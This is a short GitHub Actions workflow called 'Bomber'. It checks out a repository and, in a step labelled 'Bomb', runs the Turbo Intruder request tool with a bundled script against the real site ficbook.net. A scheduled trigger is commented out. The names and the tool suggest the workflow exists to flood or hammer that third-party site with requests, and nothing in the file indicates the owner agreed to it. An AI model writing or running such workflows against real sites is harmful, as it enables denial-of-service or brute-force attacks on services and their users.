

name: Bomber

on:
  workflow_dispatch:
  #push:
  #schedule:
  #  - cron: '5 * * * *'

jobs:

  build:

    runs-on: windows-latest  # For a list of available runner types, refer to
                             # https://help.github.com/en/actions/reference/workflow-syntax-for-github-actions#jobsjob_idruns-on

                 # Replace with the path to your Wap project, i.e. MyWpf.App.Package\MyWpfApp.Package.wapproj.

    steps:
    - name: Checkout
      uses: actions/checkout@v3
      with:
        fetch-depth: 0

    - name: Bomb
      run: java -jar turbo-intruder-all.jar beta/script.py beta/req.txt https://ficbook.net:443 foo
